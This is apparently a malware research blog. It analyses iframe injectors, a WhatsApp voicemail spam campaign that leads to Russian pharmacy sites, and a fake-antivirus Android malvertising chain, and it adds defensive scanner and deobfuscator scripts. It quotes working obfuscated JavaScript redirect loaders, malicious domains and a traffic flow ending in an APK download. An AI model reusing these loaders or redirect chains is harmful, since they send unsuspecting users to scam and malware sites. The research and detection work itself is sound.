Malware at Stake
An Official Malware Research Blog of SecNiche Security Labs. Analysis, straight from the hidden and underground.
Sunday, May 14, 2017
[Virus Bulletin Conference] The TAO of Automated Iframe Injectors - Building Drive-by Platforms For Fun and Profit
In this paper, we present the design of the distributed infection model used by attackers to inject malicious iframes on the fly and conduct large-scale drive-by download attacks. We use the term “Iframe Injectors” to refer to the automated tools attackers use to trigger mass infections. Iframe Injectors can be either standalone tools or components embedded in botnets. We discuss the classification of Iframe Injectors and dissect a number of existing tools to understand their functionality and how they are deployed effectively.
Iframes are inline frames, which are HTML objects that are embedded in a web page to fetch content (HTML or JavaScript) from a third-party domain. The content is treated as a part of the primary web page and is served when that web page is accessed. This is a known HTML functionality and is heavily used for content sharing among multiple domains. However, attackers abuse this functionality in multiple variants of drive-by download attacks as a part of massive iframe infection campaigns. An attack starts with a malicious domain that hosts malware. The attackers then embed a URL referencing the malware in an iframe and place that in a compromised website (or any other self-managed website). Users are then coerced into visiting the web page that has the iframe embedded in it. When the user visits the page, the malware is fetched from the malicious domain and the end-user system is infected.
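The paragraph above describes the mechanics of an injected iframe; from the defender's side, the practical question is how to find such frames in one's own pages. The following scanner is an added example, not code from the paper or the blog: it walks an HTML document for iframe tags whose source is on a third-party host and which are hidden or effectively invisible (zero-size, display:none, off-screen positioning). The sample HTML, the `.invalid` host names and the visibility thresholds are constructed for illustration.

```javascript
// Added example (not from the paper or the post): flag iframes that point to a
// third-party host AND are hidden, the combination typical of injected
// drive-by frames. Sample markup below is constructed; hosts use .invalid.
const SAMPLE_HTML = `
<html><body>
<h1>Site news</h1>
<iframe src="https://www.example.com/widgets/news" width="600" height="400"></iframe>
<iframe src="http://third-party.invalid/land.php" width="1" height="1" style="visibility:hidden"></iframe>
<iframe src="http://another.invalid/x.html" style="display:none;position:absolute;left:-9999px"></iframe>
</body></html>`;

// Parse the attributes of a single start tag into a lower-cased map.
function parseAttributes(tag) {
  const attrs = {};
  const re = /([a-zA-Z_:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = re.exec(tag)) !== null) {
    const value = m[2] !== undefined ? m[2] : (m[3] !== undefined ? m[3] : m[4]);
    attrs[m[1].toLowerCase()] = value;
  }
  return attrs;
}

// Return the list of reasons a frame counts as hidden (empty list = visible).
function hiddenReasons(attrs) {
  const style = (attrs.style || '').toLowerCase().replace(/\s+/g, '');
  const w = parseInt(attrs.width, 10);
  const h = parseInt(attrs.height, 10);
  const reasons = [];
  if (style.includes('display:none')) reasons.push('display:none');
  if (style.includes('visibility:hidden')) reasons.push('visibility:hidden');
  if (/(?:left|top):-\d{3,}px/.test(style)) reasons.push('positioned off-screen');
  if ((!Number.isNaN(w) && w <= 1) || (!Number.isNaN(h) && h <= 1)) reasons.push('1px or smaller');
  return reasons;
}

// Scan an HTML string; pageHost is the host the page itself is served from.
function findSuspiciousIframes(html, pageHost) {
  const findings = [];
  const tagRe = /<iframe\b[^>]*>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = parseAttributes(m[0]);
    if (!attrs.src) continue;
    let host;
    try {
      // Resolve relative sources against the page so same-site frames are kept.
      host = new URL(attrs.src, `https://${pageHost}/`).hostname;
    } catch (e) {
      continue; // unparseable src: skip rather than guess
    }
    const reasons = hiddenReasons(attrs);
    if (host !== pageHost && reasons.length > 0) {
      findings.push({ src: attrs.src, host, reasons });
    }
  }
  return findings;
}

console.log(JSON.stringify(findSuspiciousIframes(SAMPLE_HTML, 'www.example.com'), null, 2));
```

The same-host check keeps legitimate embedded widgets out of the report; a frame that is third-party but fully visible is also left alone, since that is ordinary content sharing. The output is a starting point for review, not a verdict.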
For complete details, the paper is available here: https://www.virusbulletin.com/virusbulletin/2016/10/tao-automated-iframe-injectors-building-driveby-platforms-fun-and-profit/
PDF is available here: https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Sood-Bansal.pdf
Tuesday, September 29, 2015
[Updated] Nurturing JavaScript Obfuscation and Fast Flux DNS - "Whats App Voicemail Spamming" for Russian Online Pharmacies!
Recently, we analyzed a "Whats App Fake Voicemail" spam campaign in which spammers trick end-users into visiting online pharmacy websites. There is a high chance that malware could be downloaded onto the systems of end-users visiting these spam websites; however, during this analysis we did not observe that behavior.
The trend of "Whats App Fake Voicemail" spam messages is not new; we have been encountering these spamming activities for the last few years. There have been no significant changes in the methods of sending "Whats App Fake Voicemail" notification messages, which are used to lure end-users to illegitimate domains. From a security research perspective, however, the goal is to understand how this spamming attack is carried out at the backend. Since the "Whats App" brand is used as bait, there is a high chance that people will click the links in the notification emails. This spamming attack targets a broad set of users on the Internet in order to redirect them to online pharmacy outlets managed by Russian cyber actors. Read more on the online pharmacy monetary model here: https://en.wikipedia.org/wiki/Online_pharmacy
Let's perform the analysis. The end-user receives an email notification for a "Whats App Fake Voicemail" message, as follows:
When the end-user clicks the link, the browser is redirected to the malicious domain, which serves the HTTP response headers shown below. The landing pages are hosted on a WordPress portal that appears to be a compromised website. Let's take a closer look at the HTTP request and response headers.
GET /wp-content/themes/eStore/epanel/page_templates/js/educating.php HTTP/1.1
Host: pasarjagakarsa.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 29 Sep 2015 19:32:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.44
Content-Encoding: gzip
The highlighted part of the HTTP response shows a "404 Not Found" status, which normally means the resource does not exist on the web server. In fact that is not the case here: the web server responded with the following content as part of the web page.
Before going further, check our earlier articles on JavaScript de-obfuscation:
- http://secniche.blogspot.com/2012/04/javascript-obfuscation-manual-armor-1.html
- http://secniche.blogspot.com/2012/04/javascript-obfuscation-manual-armor-2.html
- http://secniche.blogspot.com/2011/04/javascript-camouflaging-primer.html
Notice that the web page has obfuscated JavaScript embedded in it. Let's extract the obfuscated JavaScript, as shown below:
The obfuscated JS is not very complex and can be de-obfuscated easily. On de-obfuscation, we observed that the user's browser was further redirected to the following domain: "hxxp://magicorganicmarket.ru", as shown below:
Due to a misconfiguration on the landing domain "hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/educating.php", a directory listing was obtained as follows:
Several other malicious links with obfuscated JavaScript were obtained and are presented below:
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/chatterer.php
function celle() { cella=72; cellb=[191,177,182,172,183,191,118,188,183,184,118,180,183,171,169,188,177,183,182,118,176,186,173,174,133,111,176,188,188,184,130,119,119,182,169,188,189,186,169,180,176,173,186,170,187,183,189,188,180,173,188,118,186,189,111,131]; cellc=""; for(celld=0;celld<cellb.length;celld++) { cellc+=String.fromCharCode(cellb[celld]-cella); } return cellc; } setTimeout(celle(),1306);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://naturalherbsoutlet.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/elimination.php
function sicklee() { sicklea=42; sickleb=[161,147,152,142,153,161,88,158,153,154,88,150,153,141,139,158,147,153,152,88,146,156,143,144,103,81,146,158,158,154,100,89,89,145,143,152,143,156,147,141,139,147,142,141,153,151,154,139,152,163,88,156,159,81,101]; sicklec=""; for(sickled=0;sickled<sickleb.length;sickled++) { sicklec+=String.fromCharCode(sickleb[sickled]-sicklea); } return sicklec; } setTimeout(sicklee(),1276);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://genericaidcompany.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/fresnel.php
function timee() { timea=58; timeb=[177,163,168,158,169,177,104,174,169,170,104,166,169,157,155,174,163,169,168,104,162,172,159,160,119,97,162,174,174,170,116,105,105,167,159,158,163,157,155,166,173,155,160,159,173,159,172,176,163,157,159,173,104,172,175,97,117]; timec=""; for(timed=0;timed<timeb.length;timed++) { timec+=String.fromCharCode(timeb[timed]-timea); } return timec; } setTimeout(timee(),1292);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://medicalsafeservices.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/sensitive.php
function risee() { risea=80; riseb=[199,185,190,180,191,199,126,196,191,192,126,188,191,179,177,196,185,191,190,126,184,194,181,182,141,119,184,196,196,192,138,127,127,192,181,194,182,181,179,196,184,181,194,178,195,199,181,178,189,177,194,196,126,194,197,119,139]; risec=""; for(rised=0;rised<riseb.length;rised++) { risec+=String.fromCharCode(riseb[rised]-risea); } return risec; } setTimeout(risee(),1314);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://perfectherbswebmart.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/reclaimers.php
function likede() { likeda=62; likedb=[181,167,172,162,173,181,108,178,173,174,108,170,173,161,159,178,167,173,172,108,166,176,163,164,123,101,166,178,178,174,120,109,109,173,172,170,167,172,163,176,163,171,163,162,183,180,159,170,179,163,108,176,179,101,121]; likedc=""; for(likedd=0;likedd<likedb.length;likedd++) { likedc+=String.fromCharCode(likedb[likedd]-likeda); } return likedc; } setTimeout(likede(),1296);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://onlineremedyvalue.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/reclaimers.php
function politye() { politya=38; polityb=[157,143,148,138,149,157,84,154,149,150,84,146,149,137,135,154,143,149,148,84,142,152,139,140,99,77,142,154,154,150,96,85,85,148,135,154,155,152,135,146,150,143,146,146,147,135,146,146,84,152,155,77,97]; polityc=""; for(polityd=0;polityd<polityb.length;polityd++) { polityc+=String.fromCharCode(polityb[polityd]-politya); } return polityc; } setTimeout(politye(),1272);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://naturalpillmall.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/reclaimers.php
function travellere() { travellera=56; travellerb=[175,161,166,156,167,175,102,172,167,168,102,164,167,155,153,172,161,167,166,102,160,170,157,158,117,95,160,172,172,168,114,103,103,160,157,170,154,153,164,160,167,172,168,173,170,155,160,153,171,157,102,170,173,95,115]; travellerc=""; for(travellerd=0;travellerd<travellerb.length;travellerd++) { travellerc+=String.fromCharCode(travellerb[travellerd]-travellera); } return travellerc; } setTimeout(travellere(),1290);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://herbalhotpurchase.ru/
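All of the samples above use one scheme: an integer array, a per-sample subtraction key, and a String.fromCharCode loop whose result is handed to setTimeout as a string, which the browser then evaluates after the delay. As an added example that is not part of the original post, the script below decodes such a sample statically, without executing any of it, and pulls out the redirect target. The regular expressions encode my assumption about the sample layout (first integer assignment is the key, first integer array is the payload, and the loop subtracts that same key); the embedded sample is the chatterer.php script quoted above.

```javascript
// Added example, not from the original post: statically decode the
// "subtract a constant from every char code" obfuscation used by the
// samples above. Nothing from the sample is executed.
// SAMPLE_OBFUSCATED is the chatterer.php script quoted in the post.
const SAMPLE_OBFUSCATED =
  'function celle() { cella=72; cellb=[191,177,182,172,183,191,118,188,183,184,118,180,183,171,169,' +
  '188,177,183,182,118,176,186,173,174,133,111,176,188,188,184,130,119,119,182,169,188,189,186,169,' +
  '180,176,173,186,170,187,183,189,188,180,173,188,118,186,189,111,131]; cellc=""; ' +
  'for(celld=0;celld<cellb.length;celld++) { cellc+=String.fromCharCode(cellb[celld]-cella); } ' +
  'return cellc; } setTimeout(celle(),1306);';

function decodeCharCodeObfuscation(source) {
  // Key: the first "<name>=<integer>;" assignment in the script (e.g. cella=72;).
  const keyMatch = source.match(/\b([A-Za-z_$][\w$]*)\s*=\s*(\d+)\s*;/);
  // Payload: the first array literal made only of integers.
  const arrMatch = source.match(/\[\s*(\d+(?:\s*,\s*\d+)*)\s*\]/);
  // Decoder loop: String.fromCharCode(<array>[<index>] - <key>).
  const loopMatch = source.match(/String\.fromCharCode\(\s*[\w$]+\[[\w$]+\]\s*-\s*([\w$]+)\s*\)/);
  if (!keyMatch || !arrMatch || !loopMatch) {
    throw new Error('source does not match the expected obfuscation layout');
  }
  // Sanity check: the loop must subtract the constant we picked as the key.
  if (loopMatch[1] !== keyMatch[1]) {
    throw new Error(`loop subtracts ${loopMatch[1]} but the first constant is ${keyMatch[1]}`);
  }
  const key = Number(keyMatch[2]);
  const codes = arrMatch[1].split(',').map((n) => Number(n.trim()));
  return codes.map((c) => String.fromCharCode(c - key)).join('');
}

// The decoded payload is a location assignment; return the URL literal or null.
function extractRedirectTarget(decoded) {
  const m = decoded.match(/location\.href\s*=\s*['"]([^'"]+)['"]/);
  return m ? m[1] : null;
}

// Note: setTimeout(celle(),1306) calls celle() immediately and passes the
// decoded string to setTimeout, whose legacy string form evaluates it as code.
console.log(decodeCharCodeObfuscation(SAMPLE_OBFUSCATED));
console.log(extractRedirectTarget(decodeCharCodeObfuscation(SAMPLE_OBFUSCATED)));
```

Run against each of the samples above, the same function yields the pharmacy domains the post lists; the key-name check makes it fail loudly on a script that merely looks similar rather than decoding garbage.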
[Updates]
All the information and orders are actually handled by this primary outlet: hxxps://checkoutucxefvfq.fastcheckoutrx.com/
We performed tests at the network level to understand how the name servers were configured, and we found that DNS fluxing was used in this campaign. The Time-To-Live (TTL) field is set to 600 seconds, after which the IP address of the domain changes.
Here is an example:
perfectherbswebmart.ru. 600 IN A 82.199.121.167
perfectherbswebmart.ru. 600 IN A 198.144.158.52
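The two answers above show the indicator the post relies on: a short TTL combined with answers in unrelated address ranges. The following is an added example, not code from the original post, that applies that indicator to dig-style A-record lines. The two records from the post are included as-is; the third answer and the example.com control records are constructed, and the thresholds and the use of the /16 prefix as a crude stand-in for network diversity are my assumptions (a production check would use ASN or geolocation data over repeated lookups).

```javascript
// Added example, not from the original post: a simple fast-flux indicator
// over "name. ttl IN A ip" lines. Thresholds are assumptions for illustration.
const SAMPLE_ANSWERS = [
  // The two answers quoted in the post.
  'perfectherbswebmart.ru. 600 IN A 82.199.121.167',
  'perfectherbswebmart.ru. 600 IN A 198.144.158.52',
  // Constructed: imitates a later lookup of the same name after the TTL expired.
  'perfectherbswebmart.ru. 600 IN A 203.0.113.17',
  // Constructed control: a stable host, long TTL, one address.
  'example.com. 86400 IN A 192.0.2.10',
  'example.com. 86400 IN A 192.0.2.10',
];

// Parse one A-record line; returns null for anything else (CNAME, comments, ...).
function parseARecord(line) {
  const m = line.trim().match(/^(\S+)\s+(\d+)\s+IN\s+A\s+(\d{1,3}(?:\.\d{1,3}){3})$/);
  if (!m) return null;
  return { name: m[1].replace(/\.$/, ''), ttl: Number(m[2]), ip: m[3] };
}

// Group answers by owner name and score each name against the indicator.
function assessFastFlux(lines, opts) {
  const o = opts || {};
  const maxTtl = o.maxTtl === undefined ? 900 : o.maxTtl;          // "short" TTL
  const minAddresses = o.minAddresses === undefined ? 2 : o.minAddresses;
  const byName = new Map();
  for (const line of lines) {
    const rec = parseARecord(line);
    if (!rec) continue;
    const e = byName.get(rec.name) || { ips: new Set(), prefixes: new Set(), minTtl: Infinity };
    e.ips.add(rec.ip);
    e.prefixes.add(rec.ip.split('.').slice(0, 2).join('.')); // /16 as a rough network proxy
    e.minTtl = Math.min(e.minTtl, rec.ttl);
    byName.set(rec.name, e);
  }
  const report = {};
  for (const [name, e] of byName) {
    report[name] = {
      distinctIps: e.ips.size,
      distinctPrefixes: e.prefixes.size,
      minTtl: e.minTtl,
      // Short TTL alone is normal for CDNs; require address diversity as well.
      suspectedFlux: e.minTtl <= maxTtl && e.ips.size >= minAddresses && e.prefixes.size >= 2,
    };
  }
  return report;
}

console.log(JSON.stringify(assessFastFlux(SAMPLE_ANSWERS), null, 2));
```

A low TTL by itself is not evidence of anything; large content networks use them routinely. The point of the combined rule is that the addresses keep moving across unrelated networks, which is what the post's repeated lookups showed.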
Some analytical points for consideration:
- ".ru" domains have been used extensively in this spamming campaign.
- One can conclude that automated spam-code generation tools have been used in this campaign to ease the process of large-scale infection, for example by infecting PHP pages hosted on compromised websites with obfuscated JavaScript code.
- Considering the artefacts, the campaign appears to have been executed at an extensive scale.
- Many similar instances of JavaScript obfuscation have been analyzed, as presented above.
- A number of online pharmacy websites were found after de-obfuscating the JavaScript:
  - hxxp://herbalhotpurchase.ru/
  - hxxp://naturalpillmall.ru/
  - hxxp://onlineremedyvalue.ru/
  - hxxp://perfectherbswebmart.ru/
  - hxxp://medicalsafeservices.ru/
  - hxxp://genericaidcompany.ru/
  - hxxp://naturalherbsoutlet.ru/
- We believe this is just the tip of the iceberg and there will be many more.
We won't be surprised if the same tactics are used for drive-by downloads rather than spamming alone.
Note: At the time of drafting this post, all the websites were active.
Stay Secure !
Monday, May 11, 2015
"Armor for Android" - Rogue Marketing but Real Business - Who Cares for Ethics !
Malvertisements and fake AVs, an outline: Since Android is an open-source mobile platform, it is heavily targeted by attackers for malicious purposes. Android applications are pushed to users through malicious advertisements. One widely used technique is to raise fake anti-virus alerts in the form of advertisements and then offer a fake solution in the form of an anti-virus application, which is nothing but a malicious application designed to steal information, demand a ransom, or ask for money to activate the license of the fake anti-virus. One way or another, information or money is extracted from end-users by selling "risk or threat" through malicious advertisements. All of this is fake, but end-users who are not knowledgeable fall for the trap and end up providing money or information.
Interestingly, businesses are also using nefarious tactics to scare users into installing applications through dubious means. Read this for the reality of "Armor for Android": http://www.androidauthority.com/armor-for-android-342192/. Several outlets call the "Armor for Android" application rogue. Interestingly, "Armor for Android" built its business using information provided by VirusTotal.com, as highlighted in this Naked Security blog post: https://nakedsecurity.sophos.com/2013/01/10/a-chink-in-android-armour/. Even VirusTotal now classifies this application as malicious: https://www.virustotal.com/en/file/af518ec81e4ddb7b08048b7924c7f63e55c654a702f5c62ebf3e83d39c51bab2/analysis/1430705447/
We have been watching this trend for a couple of months and decided to do a brief analysis of the complete process. We still treat this application as fake or rogue based on the methods used to install the Android application on end-users' phones.
Let's take a look at the recent malicious advertisement campaign for installing "Armor for Android", a so-called authentic application that is advertised as providing effective anti-virus services. Amazingly, "Armor for Android" is still on the market despite such bad business practices; the latest campaign is discussed in this post. The questions that need critical thinking are:
- Is there any value in ethical business models in online advertisements?
- How can we obtain users' trust if rogue business tactics are used?
Step 1: The landing website generates an error notification, as shown below, claiming that the user's Galaxy Nexus phone is infected.
Step 2: After accepting the notification, the user is told that the underlying system is infected with "Hornyworm.apk".
Step 3: After an interval of a few seconds, a fake message appears showing that the user's Android phone is being scanned, and it offers a solution: downloading an anti-virus application.
Step 4: After a few more seconds, an Android application is served as follows:
Step 5: The website also shows exactly how the application needs to be installed.
The complete HTTP network flow is presented below to show the various websites through which the end-user's Android phone is bounced.
02:02:34.141 2.050 734 1383 GET 200 text/html http://www.cellphoneupdated.com/fatalvirus/us/106/index.php?countryname=United%20States&model=Galaxy%20Nexus&brand=Samsung&isp=Nobis%20Technology%20Group%2C%20LLC&voluumdata=vid..00000003-87e9-496c-8000-000000000000__vpid..5226a000-bf41-11e4-8376-93ef5ad96b35__caid..a88aabcb-264f-46ba-9801-a85f36f00867__lid..1b71b07a-7436-46e5-981f-f6273dfbcbb5__rt..DJ__oid1..4e28fd07-1e86-4ea9-9d0e-bdcfc0d9ffd1__var1..U
02:02:36.216 0.056 749 (1965) GET (Cache) application/x-javascript http://www.cellphoneupdated.com/fatalvirus/us/106/backfix.min.js
02:03:39.010 0.020 805 (82) GET (Cache) text/html http://www.cellphoneupdated.com/fatalvirus/us/106/blank.html
02:03:39.772 0.060 897 (214) GET 304 text/html http://www.cellphoneupdated.com/fatalvirus/us/106/blank.html?HistoryLoad
02:03:43.045 2.351 947 222 GET 200 text/html http://track.cellphoneupdated.com/click
02:03:45.492 2.083 657 625 GET 200 text/html http://1nxoz.redirectvoluum.com/redirect?target=http%3A%2F%2Fhop.armorforandroid.net%2Fgo%2Faa.aff%3Faffid%3D10027%26v_campaign%3Dyd447a9ysnrwv44b2m8p97au545hqbpnqrqv%26subid%3DdQ31FAIBI19DCGGI0DIHGN46&ts=1425257252676&hash=zuiF0czwgopTMlbFFybUElFtRrEzh08G4HY3fKQ%2FH%2FQ%3D&rm=DJ
02:03:47.618 2.253 749 846 GET 302 Redirect to: http://www.fastermobile.org/v3e/index.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812 http://hop.armorforandroid.net/go/aa.aff?affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46
02:03:49.959 0.148 1028 215 GET 303 Redirect to: /k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/index.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812 http://www.fastermobile.org/v3e/index.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812
02:03:50.154 0.113 1090 3072 GET 200 text/html http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/index.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812
02:03:50.293 0.145 864 1025 GET 200 text/css http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/a.css
02:03:50.312 0.046 877 (0) GET (Cache) application/javascript http://cdnjs.cloudflare.com/ajax/libs/zepto/1.1.4/zepto.min.js
02:03:50.330 0.232 879 891 GET 200 image/png http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/z.png
02:03:50.473 0.144 837 455 GET 200 application/x-javascript http://antivirus.trafficmanager.net/threatCount?range=7&callback=jsonp1&_=1425257258028
02:03:50.498 0.252 799 226 GET 200 application/javascript http://api.handsetdetection.com/sites/js/32266.js
02:03:50.525 0.285 877 167 GET 204 text/plain http://pixel.sitescout.com/iap/14b1248479c050b7
02:03:50.563 0.165 506 824 GET 200 image/png http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/p.png
02:03:50.583 0.370 539 35219 GET 200 application/x-font-ttf http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/font.ttf
02:03:54.517 0.178 1278 2382 GET 200 text/html http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/i.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812
02:03:54.738 0.151 861 1085 GET 200 text/css http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/aa.css
02:03:54.757 0.031 873 (0) GET (Cache) application/javascript http://cdnjs.cloudflare.com/ajax/libs/zepto/1.1.4/zepto.min.js
02:03:54.924 0.056 787 (1560) GET (Cache) application/x-javascript http://connect.facebook.net/en_US/fbds.js
02:03:54.950 0.240 873 167 GET 204 text/plain http://pixel.sitescout.com/iap/0770a2fc94ca2cbc
02:03:55.018 2.176 2106 334 POST 200 image/gif https://www.facebook.com/tr/
02:03:57.279 2.584 1205 3.2M GET 200 application/vnd.android.package-archive http://dlhub1.com/download/full?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812
02:04:05.722 0.165 507 14521 GET 200 image/png http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/x.png
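The flow above is long, and the chain of hosts is what matters when triaging a malvertising path: which domain served the landing page, which ones were pure redirectors, and which one finally handed out the APK. The following is an added example, not code from the original post, that parses lines in the export's layout and reconstructs that chain. The field layout (time, elapsed seconds, bytes sent, bytes received, method, status, content type or "Redirect to:" target, URL) is my reading of the export above; the sample lines are shortened copies of lines from the flow with the long tracking query strings trimmed.

```javascript
// Added example, not from the original post: parse HTTP-flow export lines
// and reconstruct the redirect chain plus the final package download.
// Sample lines are shortened from the flow quoted in the post.
const SAMPLE_FLOW = [
  '02:02:34.141 2.050 734 1383 GET 200 text/html http://www.cellphoneupdated.com/fatalvirus/us/106/index.php?model=Galaxy%20Nexus',
  '02:03:43.045 2.351 947 222 GET 200 text/html http://track.cellphoneupdated.com/click',
  '02:03:45.492 2.083 657 625 GET 200 text/html http://1nxoz.redirectvoluum.com/redirect?target=http%3A%2F%2Fhop.armorforandroid.net%2Fgo%2Faa.aff',
  '02:03:47.618 2.253 749 846 GET 302 Redirect to: http://www.fastermobile.org/v3e/index.html?pop=1 http://hop.armorforandroid.net/go/aa.aff?affid=10027',
  '02:03:50.312 0.046 877 (0) GET (Cache) application/javascript http://cdnjs.cloudflare.com/ajax/libs/zepto/1.1.4/zepto.min.js',
  '02:03:57.279 2.584 1205 3.2M GET 200 application/vnd.android.package-archive http://dlhub1.com/download/full?product=anti-virus',
];

// One export line -> record, or null if the line does not fit the layout.
function parseFlowLine(line) {
  const t = line.trim().split(/\s+/);
  if (t.length < 8) return null;
  const rec = { time: t[0], elapsed: Number(t[1]), method: t[4], status: t[5],
                contentType: null, redirectTo: null, url: null, host: null };
  if (t[6] === 'Redirect' && t[7] === 'to:') {
    // Redirect rows carry the Location target before the requested URL.
    rec.redirectTo = t[8];
    rec.url = t[9];
  } else {
    rec.contentType = t[6];
    rec.url = t[7];
  }
  if (!rec.url) return null;
  rec.host = new URL(rec.url).hostname;
  return rec;
}

function parseFlow(lines) {
  return lines.map(parseFlowLine).filter(Boolean);
}

// Ordered list of distinct hosts the client touched, including redirect targets
// (resolved against the requesting URL so relative Location values work too).
function hopSequence(records) {
  const hops = [];
  const push = (h) => { if (hops[hops.length - 1] !== h) hops.push(h); };
  for (const r of records) {
    push(r.host);
    if (r.redirectTo) push(new URL(r.redirectTo, r.url).hostname);
  }
  return hops;
}

// Rows that delivered an Android package, the end of the chain.
function findPackageDownloads(records) {
  return records.filter((r) => r.contentType === 'application/vnd.android.package-archive');
}

const parsedFlow = parseFlow(SAMPLE_FLOW);
console.log(hopSequence(parsedFlow).join(' > '));
console.log(findPackageDownloads(parsedFlow).map((r) => r.url));
```

The hop list is what one would hand to a blocking or takedown workflow; the package-download filter separates the one row that actually delivered a binary from the dozens of tracking and asset requests around it.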
The application looks as shown below. It asks for the user's credit or debit card information in order to conduct a transaction so that the fake anti-virus application can be installed after obtaining a license. The whole process is fake.
Assets Information:
parameters.json {
"bugsense_key": "f75779a2",
"analytics_key": "01c0994d555ea19e1ef7e0e5b69c9dab",
"security_key": "ca9u",
"quick_scan": "true",
"device_threats": "false"
}
version.json {
"configuration": "1983",
"pop": "1",
"version": "release-search",
"strat": "2",
"page": "aa.matt.5svp.0830",
"split": "c9c82b85.control",
"ccrule": "fcc98f53",
"offer": "aa.gi.default",
"product": "anti-virus",
"partner": "afacom",
"country": "xx",
"language": "en",
"pool": "9d05eb72",
"affid": "10027",
